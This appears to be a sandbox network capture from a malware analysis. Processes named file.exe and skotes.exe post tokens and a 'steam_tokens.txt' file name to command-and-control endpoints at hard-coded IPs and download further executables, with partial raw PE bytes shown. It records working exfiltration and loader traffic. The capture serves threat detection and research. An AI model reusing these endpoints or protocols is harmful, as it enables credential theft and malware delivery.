Dec 10, 2024 00:42:33.394196033 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="file"------IDAKJKEHDBGHIDHIEHDB--
Dec 10, 2024 00:42:34.313685894 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:34.339190006 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKEHIEBKJKFIEBGDGDAA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 48 49 45 42 4b 4a 4b 46 49 45 42 47 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------KKEHIEBKJKFIEBGDGDAAContent-Disposition: form-data; name="message"ybncbhylepme------KKEHIEBKJKFIEBGDGDAA--
Dec 10, 2024 00:42:34.778249025 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49759	185.215.113.16	80	7288	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:42:34.904828072 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 10, 2024 00:42:36.246623039 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:42:35 GMT Content-Type: application/octet-stream Content-Length: 3196416 Last-Modified: Mon, 09 Dec 2024 23:16:00 GMT Connection: keep-alive ETag: "67577a30-30c600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0@11@Wk(00 @.rsrc@.idata @ybwlghty**@bbydquix00@.taggant00"0@
Dec 10, 2024 00:42:36.246676922 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:42:36.247164011 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:42:36.247258902 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:42:36.247267962 CET	248	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:42:36.247450113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:42:36.247533083 CET	1236	IN	Data Raw: 67 09 65 db ac 0a 32 a8 22 71 69 43 d2 4c a9 db 4c b3 95 21 d6 ef 52 48 d5 c7 cd cb 23 8b 65 c3 87 09 65 db ac 0a 32 a8 22 71 69 43 9a 4c a9 db 4c cb 94 21 d6 ef 32 48 d5 c7 cd 2b 24 8b 65 c3 a7 09 65 db ac 0a 32 a8 22 71 69 43 a2 4c a9 db 4c 5b Data Ascii: ge2"qiCLL!RH#ee2"qiCLL!2H+$ee2"qiCLL[!H$ee2"qiCLL!G"ee2"qiCLL!GK#ee2"qiCzLL!G#e'e2"qiCLLC!G&eGe2"qiCLL
Dec 10, 2024 00:42:36.247541904 CET	248	IN	Data Raw: d6 ef 92 43 d5 c7 cd 0b 32 8b 65 c3 47 44 65 db ac 0a 32 a8 22 71 75 43 1e 4d a9 db 4c 6b 93 21 d6 ef 72 43 d5 c7 cd 6b 32 8b 65 c3 67 44 65 db ac 0a 32 a8 22 71 81 43 32 4d a9 db 4c bf 98 21 d6 ef 52 43 d5 c7 cd cb 30 8b 65 c3 87 44 65 db ac 0a Data Ascii: C2eGDe2"quCMLk!rCk2egDe2"qC2ML!RC0eDe2"quCML!2C+1eDe2"qyCNL!C1eDe2"qmCNL!B3eDe2"qyCNL!BK4eCe2"qmCNL'!B4e'Ce2
Dec 10, 2024 00:42:36.247910023 CET	1236	IN	Data Raw: ae 4e a9 db 4c 33 9a 21 d6 ef 92 42 d5 c7 cd 0b 33 8b 65 c3 47 43 65 db ac 0a 32 a8 22 71 75 43 86 4e a9 db 4c b3 8f 21 d6 ef 72 42 d5 c7 cd 6b 33 8b 65 c3 67 43 65 db ac 0a 32 a8 22 71 69 43 5a 4e a9 db 4c a3 90 21 d6 ef 52 42 d5 c7 cd cb f5 8b Data Ascii: NL3!B3eGCe2"quCNL!rBk3egCe2"qiCZNL!RBeCe2"q}CbNLs!2B+eCe2"quC>NL;!BeCe2"qmCRNL#!AeCe2"qmCNL{!AKeBe2"qmC*NL!Ae
Dec 10, 2024 00:42:36.247970104 CET	1236	IN	Data Raw: 07 3e 65 db ac 0a 32 a8 22 71 69 43 26 52 a9 db 4c 33 8f 21 d6 ef b2 3d d5 c7 cd ab 01 8b 65 c3 27 3e 65 db ac 0a 32 a8 22 71 75 43 2e 52 a9 db 4c 5b 8f 21 d6 ef 92 3d d5 c7 cd 0b 04 8b 65 c3 47 3e 65 db ac 0a 32 a8 22 71 69 43 02 52 a9 db 4c 73 Data Ascii: >e2"qiC&RL3!=e'>e2"quC.RL[!=eG>e2"qiCRLs!r=keg>e2"q}CRLK!R=e>e2"qCSL+!2=+e>e2"qqCSL!=e>e2"qqCSL!<e>e2"qmCSL
Dec 10, 2024 00:42:36.367693901 CET	1236	IN	Data Raw: da c7 31 a8 22 9c ee c7 ac 52 55 eb aa 07 f1 21 da 97 2a e2 69 cc a8 db 7b d6 3b dc 5e 8c 6d 5e 16 cb b5 c3 b2 dc 66 db 56 0b 6e 66 1c a5 c0 9d da c7 31 a8 22 54 a5 df 1a c8 f9 e0 98 c7 b5 c3 37 dc 66 db ac 0a 32 a8 22 13 32 a8 22 13 32 a8 22 13 Data Ascii: 1"RU!i{;^m^fVnf1"T7f2"2"2"2"RM L-'"RUii{nEMHe^'_+i\*2"2"Mee2"2"^XeVnf1"2"R%\|;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49760	185.215.113.206	80	7288	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:42:41.765187979 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BFHDAEHDAKECGCAKFCFI--
Dec 10, 2024 00:42:43.581928968 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49778	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:04.955060005 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:43:06.281526089 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49784	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:07.920726061 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:43:09.281609058 CET	770	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 34 33 0d 0a 20 3c 63 3e 31 30 31 33 35 34 35 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 61 32 61 63 30 31 30 31 65 65 37 30 34 62 64 31 38 31 36 30 33 35 62 63 63 64 39 62 36 34 62 62 61 62 37 39 61 35 35 33 36 65 36 23 31 30 31 33 35 35 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 31 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 31 33 35 35 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 35 35 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 [TRUNCATED] Data Ascii: 243 <c>1013545001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9a2ac0101ee704bd1816035bccd9b64bbab79a5536e6#1013551001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1013556001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013557001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013558001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013559001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49790	31.41.244.11	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:09.406933069 CET	66	OUT	GET /files/1521297942/n4e23hz.exe HTTP/1.1 Host: 31.41.244.11
Dec 10, 2024 00:43:10.727305889 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:10 GMT Content-Type: application/octet-stream Content-Length: 1765888 Last-Modified: Mon, 09 Dec 2024 22:34:17 GMT Connection: keep-alive ETag: "67577069-1af200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 08 00 00 00 00 00 00 00 e0 45 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 46 00 00 04 00 00 25 99 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 60 01 00 69 00 00 00 00 40 01 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELcE @@ F%@U`i@a @.rsrc@@.idata `@ *@kzyimikk +@vgdirfva E@.taggant@E"@
Dec 10, 2024 00:43:10.727405071 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727555037 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727627039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727638006 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727791071 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727852106 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.727864981 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.728051901 CET	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 00:43:10.728064060 CET	1236	IN	Data Raw: 9b 79 96 24 44 82 97 24 44 82 98 24 44 83 5d d2 2e cc 9a d1 16 cc 9b d1 16 cc 9c 27 5a 98 bc ac 34 9b 9e e3 61 4c a1 c6 6f 7f 77 de 2e fb 72 a0 68 68 73 6e 85 e8 8c 74 78 77 de 28 74 5e 6a 0a a7 61 31 bc 7a dc f2 70 6b da de 77 6a 92 28 76 82 67 Data Ascii: y$D$D$D].'Z4aLow.rhhsntxw(t^ja1zpkwj(vgp;HAkYu[}D;eHqmP]Iv^YAmth@oyuG%XA6**$qhQ IRrVWw
Dec 10, 2024 00:43:10.846599102 CET	1236	IN	Data Raw: f4 54 86 22 97 9c 92 29 95 6f 3f d8 ad 9a 79 86 92 a7 b4 bd 6c 92 f3 a3 64 2d 01 ca 7d 8f a7 bd 25 65 a4 dc 71 96 8a 08 f6 b7 41 cc b8 dd b4 a3 71 4c c1 72 6b 3e 08 d9 fb fa 3d c9 cf 7b 74 32 27 ac 1c 2b cd 4a 7b ce 86 14 b5 2c cd 83 7b 08 48 b7 Data Ascii: T")o?yld-}%eqAqLrk>={t2'+J{,{HwTp\|szt3.Lcu-\ow7V fv{gT?h^Ds#V^wV.s[kZ_>Fu]zouZ[n{BLg1r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49806	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:16.153481007 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 35 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013545001&unit=246122658369
Dec 10, 2024 00:43:17.483519077 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49812	31.41.244.11	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:43:17.605384111 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 10, 2024 00:43:18.925261021 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:43:18 GMT Content-Type: application/octet-stream Content-Length: 1947136 Last-Modified: Mon, 09 Dec 2024 22:35:01 GMT Connection: keep-alive ETag: "67577095-1db600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 e0 85 00 00 10 00 